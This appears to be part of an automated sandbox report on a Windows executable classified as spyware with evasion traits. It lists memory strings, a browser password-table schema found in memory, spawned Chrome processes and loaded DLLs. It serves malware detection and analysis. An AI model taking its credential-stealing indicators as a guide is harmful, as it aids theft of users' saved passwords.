              Source: file.exe, 00000000.00000003.2426687319.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425323310.0000000005EBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425087299.0000000005F70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2564930472.000000000598F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2443641115.0000000005F5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424042588.0000000005F4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424140559.0000000005E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2471945076.0000000005A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2438108091.0000000005E10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2472348309.000000000598F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429936062.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426289246.0000000005EC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2423650952.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429782038.0000000005FEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2430771950.0000000005F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2437666301.0000000006066000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2561917561.00000000010A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
              Source: file.exe, 00000000.00000003.2439607547.0000000005E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2421848069.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2472240288.00000000010A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
              Source: file.exe, 00000000.00000003.2426834713.0000000005EDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2430108868.0000000005F0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2436409700.0000000006071000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425827107.0000000005F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2436030514.0000000005E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2472240288.00000000010C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOUW vs file.exe
              Source: file.exe, 00000000.00000003.2423365401.0000000005A62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2437348936.0000000005F36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425600633.0000000005E09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2432677200.0000000006020000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429153678.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2431563925.0000000005F1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2430581213.0000000005E02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2433265981.0000000005F14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2432419525.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2430424702.0000000005EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2536556224.0000000005963000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425934649.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425486236.0000000005F79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2431253980.0000000005E11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2441721440.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2435293386.0000000005F22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2427764287.0000000005FBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2432967652.0000000005F1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2433571424.0000000005F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2431750409.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2441040547.0000000005E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429311767.0000000005EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424306687.0000000005EAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2436211269.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2434318075.0000000005F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2436585966.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2433427541.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2473053349.00000000010AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
              Source: file.exe, 00000000.00000003.2421663303.0000000005E02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2421494459.0000000005C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429632946.0000000005EF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2536556224.000000000598F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424545550.0000000005F5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2423745991.0000000005F3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2435479043.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426426438.0000000005F8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2471980185.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428817072.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429462752.0000000005E09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2437071816.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2565734313.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2421555000.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2427242148.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2423843079.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424971242.0000000005EBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428367881.0000000005E0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2443383244.0000000005E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2435798776.000000000605C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2443910501.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424656520.0000000005E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2432064912.0000000005F0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426985423.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428638823.0000000005E02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2438933462.0000000005F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2472909519.00000000010C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOUW vs file.exe
              Source: file.exe, 00000000.00000003.2444139656.0000000005F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424757730.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2427500679.0000000005E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2421939156.0000000005A67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2427632363.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2427375760.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2435636518.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2421754131.0000000005A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2423523627.0000000005E02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2430282783.0000000005E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2422012758.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2433106589.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428173405.0000000005EE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2432822074.0000000005E02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2442747667.000000000609A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2433876601.0000000005E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428498402.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426043145.0000000005EC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2424860611.0000000005E07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2433728394.000000000603D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426160736.0000000005E06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2440349759.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2434970828.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428988695.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2436831976.0000000005F40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2423940610.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9986194523615635
              Source: file.exeStatic PE information: Section: lupaymij ZLIB complexity 0.994489993513431
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/61@7/7
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2215051588.000000000597D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214564459.0000000005999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 31%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: file.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2004,i,13335874620287231471,17284444125503527101,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=1996,i,18408715541655219885,10244720130942789810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2004,i,13335874620287231471,17284444125503527101,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=1996,i,18408715541655219885,10244720130942789810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
